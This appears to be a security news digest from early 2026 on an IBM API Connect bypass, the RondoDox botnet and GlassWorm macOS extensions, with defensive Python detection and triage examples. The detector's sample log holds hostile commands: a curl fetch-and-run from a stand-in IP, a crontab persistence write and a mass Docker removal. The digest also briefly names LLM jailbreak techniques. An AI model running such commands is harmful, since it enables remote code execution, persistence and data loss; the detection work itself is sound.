Urgent IBM API Fixes Amid Botnet and macOS Threats

Coverage: 01 Jan 2026 (UTC)

Urgent platform guidance led the day as IBM moved to contain an authentication bypass in API Connect with interim fixes and mitigations, per CSO. On the incident front, researchers detailed a botnet abusing the critical React2Shell flaw to conscript web apps and IoT devices, according to THN. macOS developers also faced a renewed supply‑chain threat as GlassWorm resurfaced via trojanized editor extensions, reported by BleepingComputer.

API gateways under pressure

IBM API Connect received interim fixes and urgent guidance for CVE‑2025‑13915, a critical flaw enabling remote, no‑interaction authentication bypass across releases 10.0.8.0–10.0.8.5 and 10.0.11.0, per CSO. IBM issued platform‑specific updates for VMware, OCP/CP4I, and Kubernetes deployments and recommended temporarily disabling self‑service sign‑up on Developer Portals if patching is delayed. The weakness, mapped to CWE‑305, was found during internal testing and can expose applications that inherit trust from the gateway rather than revalidating identity.

Analysis cited in the report notes that bypassing gateway‑enforced identity can silently cascade trust failures across downstream services and significantly widen blast radius across the control plane. Remediation touches management‑plane components and uses image overrides, introducing operational risk if temporary changes persist across upgrades. The guidance emphasizes accelerating patching, inventorying API endpoints and dependencies, enabling behavior monitoring and enhanced logging, and reassessing API governance and resilience—not just applying a point fix. Why it matters: gateways are often a single enforcement point; when identity checks fail there, failures propagate.
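The "inherit trust from the gateway rather than revalidating identity" weakness is easier to reason about with both patterns side by side. The following Python is an added example written for this brief; it is not IBM's code and not taken from the CSO report. It shows a downstream service that accepts whatever identity header the gateway forwarded, beside one that verifies a signed assertion itself. The header names, the compact HMAC-signed token format and the verification key are assumptions constructed for the example (a real deployment would verify the identity provider's signature with its published key).

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed verification key shared with the identity provider; an assumption
# for this example only (a real deployment would use the IdP's public key).
VERIFY_KEY = b"example-verification-key-not-real"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(subject, ttl_seconds=300, key=VERIFY_KEY, now=None):
    """Stand-in for the identity provider: emit 'payload.signature' where the
    signature is HMAC-SHA256 over the base64url payload (constructed format)."""
    now = int(time.time()) if now is None else now
    payload = _b64url(json.dumps({"sub": subject, "exp": now + ttl_seconds}).encode())
    sig = _b64url(hmac.new(key, payload.encode(), hashlib.sha256).digest())
    return f"{payload}.{sig}"


def handle_trusting_gateway(headers):
    """Weak pattern: believe the identity the gateway forwarded. If the gateway's
    own authentication is bypassed, whatever arrives in this header is accepted."""
    user = headers.get("X-Authenticated-User")
    if not user:
        raise PermissionError("no forwarded identity")
    return user


def handle_revalidating(headers, key=VERIFY_KEY, now=None):
    """Hardened pattern: verify the signed assertion locally and take the subject
    from its claims; the unsigned X-Authenticated-User header is never consulted."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Bearer "):
        raise PermissionError("missing bearer token")
    parts = auth[len("Bearer "):].split(".")
    if len(parts) != 2:
        raise PermissionError("malformed token")
    payload_b64, sig_b64 = parts
    expected = hmac.new(key, payload_b64.encode(), hashlib.sha256).digest()
    try:
        presented = _b64url_decode(sig_b64)
    except ValueError:
        raise PermissionError("malformed signature")
    if not hmac.compare_digest(expected, presented):
        raise PermissionError("bad signature")
    claims = json.loads(_b64url_decode(payload_b64))
    now = int(time.time()) if now is None else now
    if claims.get("exp", 0) <= now:
        raise PermissionError("token expired")
    return claims["sub"]


def authorize_request(headers, now=None):
    """Run both handlers on one request and return (trusting_result,
    revalidating_result), each a subject string or a 'denied: ...' message."""
    out = []
    for handler in (handle_trusting_gateway, lambda h: handle_revalidating(h, now=now)):
        try:
            out.append(handler(headers))
        except PermissionError as exc:
            out.append(f"denied: {exc}")
    return tuple(out)


if __name__ == "__main__":
    token = mint_token("alice")
    # A request whose forwarded header was tampered with but whose token is genuine.
    spoofed = {"X-Authenticated-User": "admin", "Authorization": "Bearer " + token}
    print(authorize_request(spoofed))  # trusting handler says admin; revalidating says alice
```

The point of the comparison is the blast-radius argument in the report: with the trusting handler, a single bypass at the gateway is accepted by every service behind it, whereas the revalidating handler fails closed on a missing, tampered or expired assertion regardless of what the gateway forwarded.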

Botnet turns a critical web flaw into scale

Researchers describe a nine‑month campaign that added IoT devices and web apps to the RondoDox botnet by exploiting the React2Shell vulnerability in React Server Components/Next.js (CVE‑2025‑55182, CVSS 10.0), according to THN. The operation, active since early 2025, also leverages N‑day flaws including CVE‑2023‑1389 and CVE‑2025‑24893. Shadowserver telemetry counted about 90,300 publicly reachable instances still vulnerable as of December 31, 2025, with roughly 68,400 in the U.S., 4,300 in Germany, 2,800 in France, and 1,500 in India.

Activity evolved from March–April reconnaissance and manual scanning to April–June daily mass probing of web apps (WordPress, Drupal, Struts2) and IoT devices (Wavlink routers), progressing by July into hourly automated deployments. In observed December waves, operators scanned for vulnerable Next.js servers and deployed cryptocurrency miners ("/nuts/poop"), a loader/health checker ("/nuts/bolts"), and a Mirai variant ("/nuts/x86"). The /nuts/bolts component removes competing malware and Docker artifacts, enumerates /proc, aggressively kills non‑whitelisted processes about every 45 seconds, establishes persistence via /etc/crontab, and then pulls the main bot from its command‑and‑control. Mitigations highlighted by researchers include patching Next.js, segmenting IoT devices on dedicated VLANs, using web application firewalls, monitoring for suspicious process execution, and blocking known C2 infrastructure.
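Several of the behaviours described above are visible in ordinary process-execution telemetry: a download from a /nuts/ staging path, a shell append to /etc/crontab, removal of Docker artifacts, and repeated SIGKILLs from one process on a roughly 45-second cadence. The following Python is an added example written for this brief, not code from the THN report or the researchers it cites. The key=value event format, the sample events and the 203.0.113.10 address are constructed for the example and stand in for whatever an EDR or auditd pipeline emits; the cadence band (30 to 60 seconds, at least three kills) is an assumption chosen around the reported interval.

```python
import re
from collections import defaultdict

# Constructed process-execution events in a simple key=value format. This is
# not a real auditd or EDR schema; map your own telemetry's fields onto it.
SAMPLE_EVENTS = """\
ts=1000 pid=4101 ppid=1 exe=/usr/bin/node argv="node server.js"
ts=1002 pid=4190 ppid=4101 exe=/bin/sh argv="sh -c curl -s http://203.0.113.10/nuts/bolts -o /tmp/.b && chmod +x /tmp/.b && /tmp/.b"
ts=1003 pid=4192 ppid=4190 exe=/tmp/.b argv="/tmp/.b"
ts=1004 pid=4193 ppid=4192 exe=/bin/sh argv="sh -c echo '* * * * * root /tmp/.b' >> /etc/crontab"
ts=1005 pid=4194 ppid=4192 exe=/bin/sh argv="sh -c docker rm -f $(docker ps -aq)"
ts=1006 pid=4192 action=kill target=3011 signal=9
ts=1051 pid=4192 action=kill target=3015 signal=9
ts=1096 pid=4192 action=kill target=3020 signal=9
ts=1141 pid=4192 action=kill target=3022 signal=9
ts=1200 pid=5000 ppid=1 exe=/usr/bin/apt argv="apt upgrade -y"
"""

KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# Reported cadence of the process killer is roughly 45 s; accept a band (assumption).
KILL_GAP_MIN, KILL_GAP_MAX, KILL_MIN_EVENTS = 30, 60, 3


def parse_event(line):
    """Split one key=value line into a dict; quoted values may contain spaces."""
    ev = {}
    for key, val in KV_RE.findall(line):
        if len(val) >= 2 and val[0] == val[-1] == '"':
            val = val[1:-1]
        ev[key] = val
    ev["ts"] = int(ev.get("ts", 0))
    return ev


def detect(log_text):
    """Run the four rules over the event text and return a list of findings."""
    findings = []
    kills = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        pid, ts, argv = ev.get("pid"), ev["ts"], ev.get("argv", "")
        if ev.get("action") == "kill" and ev.get("signal") == "9":
            kills[pid].append(ts)
            continue
        if re.search(r"\b(curl|wget)\b", argv) and "/nuts/" in argv:
            findings.append({"rule": "staging_path_fetch", "ts": ts, "pid": pid,
                             "detail": "download from known /nuts/ staging path"})
        if "/etc/crontab" in argv and re.search(r">>?|\btee\b", argv):
            findings.append({"rule": "crontab_persistence", "ts": ts, "pid": pid,
                             "detail": "shell write to /etc/crontab"})
        if re.search(r"\bdocker\s+(rm|rmi|system\s+prune)\b", argv):
            findings.append({"rule": "docker_cleanup", "ts": ts, "pid": pid,
                             "detail": "removal of Docker artifacts"})
    # Cadence rule: one process sending repeated SIGKILLs at a regular interval.
    for pid, stamps in kills.items():
        stamps.sort()
        if len(stamps) < KILL_MIN_EVENTS:
            continue
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if all(KILL_GAP_MIN <= g <= KILL_GAP_MAX for g in gaps):
            findings.append({"rule": "periodic_process_kill", "ts": stamps[0], "pid": pid,
                             "detail": f"{len(stamps)} SIGKILLs at ~{round(sum(gaps) / len(gaps))}s cadence"})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['rule']}] ts={f['ts']} pid={f['pid']}: {f['detail']}")
```

The cadence rule is the one worth keeping even after the staging paths change, since it keys on the behaviour (a single process repeatedly killing others on a timer) rather than on a string the operators can rotate; the path and crontab rules are cheap high-confidence matches for the current wave.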

Trojanized extensions target macOS developers

A fourth GlassWorm wave is targeting macOS developers through trojanized extensions on OpenVSX and the Visual Studio Marketplace, BleepingComputer reports, citing Koi Security research. Unlike earlier waves using invisible Unicode tricks or Rust binaries, this iteration hides an AES‑256‑CBC‑encrypted payload in compiled JavaScript and delays execution ~15 minutes to evade sandboxing. Persistence is installed via LaunchAgents, with AppleScript used in place of PowerShell, while command‑and‑control again relies on Solana blockchain mechanisms.

Capabilities include theft of developer credentials (GitHub, npm, OpenVSX), browser data, and Keychain passwords, plus remote access via VNC and SOCKS proxying. The operators can detect wallet software such as Ledger Live and Trezor Suite and attempt replacement with trojanized versions; researchers note the seeded wallets currently return empty files, suggesting incomplete payload deployment. Identified extensions show more than 33,000 installs, though download counts can be gamed. Immediate steps advised: remove flagged extensions, reset GitHub passwords, revoke npm tokens, hunt for indicators of compromise, and consider OS reinstallation if infection is confirmed. Why it matters: third‑party extension ecosystems remain a high‑leverage route to developer workstations and cryptocurrency assets.
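For the "hunt for indicators of compromise" step, the following Python is an added example written for this brief; it is not Koi Security's or BleepingComputer's tooling. It triages user LaunchAgent plists for AppleScript invocation or programs outside trusted locations (the page notes persistence via LaunchAgents with AppleScript), and matches installed VS Code-style extension folders against a flagged list. The flagged extension ID, the trusted-prefix list and the demo fixture are placeholders constructed for the example; substitute the extension identifiers published in the research.

```python
import os
import re
import plistlib
import tempfile

# Placeholder flagged extension IDs (publisher.name). Constructed for this
# example; replace with the identifiers published in the vendor research.
FLAGGED_EXTENSION_IDS = {"example-publisher.flagged-extension"}

# Program locations a user-level LaunchAgent would ordinarily point at (assumption).
TRUSTED_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/System/", "/Applications/", "/Library/Apple/")


def triage_launch_agents(agents_dir):
    """Return LaunchAgent plists worth a closer look: any whose program invokes
    osascript/AppleScript or lives outside the trusted prefixes."""
    findings = []
    if not os.path.isdir(agents_dir):
        return findings
    for name in sorted(os.listdir(agents_dir)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(agents_dir, name)
        try:
            with open(path, "rb") as fh:
                plist = plistlib.load(fh)
        except Exception as exc:  # a plist that will not parse is itself notable
            findings.append({"plist": name, "program": None, "reasons": [f"unparseable: {exc}"]})
            continue
        args = plist.get("ProgramArguments") or ([plist["Program"]] if "Program" in plist else [])
        if not args:
            continue
        program, joined = args[0], " ".join(args)
        reasons = []
        if "osascript" in joined or re.search(r"\.scpt\b", joined):
            reasons.append("invokes AppleScript")
        if not program.startswith(TRUSTED_PREFIXES):
            reasons.append(f"program outside trusted locations: {program}")
        if reasons and plist.get("RunAtLoad"):
            reasons.append("RunAtLoad set")
        if reasons:
            findings.append({"plist": name, "program": program, "reasons": reasons})
    return findings


def inventory_extensions(ext_dir, flagged=FLAGGED_EXTENSION_IDS):
    """Match extension folders named publisher.name-version (the VS Code /
    VSCodium layout) against the flagged set; return matching folder names."""
    wanted = {f.lower() for f in flagged}
    hits = []
    if not os.path.isdir(ext_dir):
        return hits
    for folder in sorted(os.listdir(ext_dir)):
        m = re.match(r"^([A-Za-z0-9_-]+\.[A-Za-z0-9_-]+)-\d", folder)
        if m and m.group(1).lower() in wanted:
            hits.append(folder)
    return hits


def build_demo_fixture():
    """Create a throwaway directory tree (constructed, not a real host) with one
    suspicious and one benign LaunchAgent plus two extension folders."""
    root = tempfile.mkdtemp(prefix="ioc-hunt-demo-")
    agents = os.path.join(root, "LaunchAgents")
    ext = os.path.join(root, "extensions")
    os.makedirs(agents)
    os.makedirs(ext)
    with open(os.path.join(agents, "com.example.updater.plist"), "wb") as fh:
        plistlib.dump({"Label": "com.example.updater",
                       "ProgramArguments": ["/usr/bin/osascript", "/Users/dev/Library/Caches/.u.scpt"],
                       "RunAtLoad": True}, fh)
    with open(os.path.join(agents, "com.example.benign.plist"), "wb") as fh:
        plistlib.dump({"Label": "com.example.benign", "ProgramArguments": ["/usr/bin/true"]}, fh)
    for folder in ("example-publisher.flagged-extension-1.2.3", "ms-python.python-2024.0.1"):
        os.makedirs(os.path.join(ext, folder))
    return agents, ext


if __name__ == "__main__":
    # On a real workstation point these at ~/Library/LaunchAgents and
    # ~/.vscode/extensions (or ~/.vscode-oss/extensions for VSCodium).
    agents_dir, ext_dir = build_demo_fixture()
    for finding in triage_launch_agents(agents_dir):
        print("LaunchAgent:", finding)
    for hit in inventory_extensions(ext_dir):
        print("Flagged extension installed:", hit)
```

Treat the LaunchAgent triage as a shortlist for a human, not a verdict: legitimate agents do occasionally run osascript, and the trusted-prefix list is deliberately narrow. The extension check is only as good as the flagged list, so the install counts it reports are not a measure of exposure on their own.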

2025 lessons shaping priorities

Infosecurity’s year‑end review highlights a year defined by high‑impact incidents and shifting defenses. Vendor dynamics included Microsoft, SentinelOne, and Palo Alto Networks stepping back from MITRE ATT&CK Evaluations, prompting renewed engagement plans from MITRE. Vulnerability management advanced with NIST’s Likely Exploited Vulnerabilities (LEV) metric complementing EPSS and KEV to refine remediation priorities. Fortinet features prominently with a data release tied to a 2022 zero‑day and a separate critical zero‑day (CVE‑2024‑55591) that drove urgent patching and credential rotation.

Supply‑chain risks surfaced through quick removal of malicious npm packages carrying a crypto‑clipper payload, underscoring the community’s fast response. Attack techniques evolved: QR‑code quishing to bypass email filters, LLM jailbreaks such as the Grok‑4 exploit blending Echo Chamber and Crescendo methods, and “slopsquatting,” where hallucinated package names create new supply‑chain exposure. To counter AI‑driven risks, OWASP’s Securing Agentic Applications Guide v1.0 offered practical controls for agentic and multi‑agent systems. The thread through these stories is consistent: better vulnerability prioritization, proactive patching, and stronger software supply‑chain hygiene will shape 2026 agendas.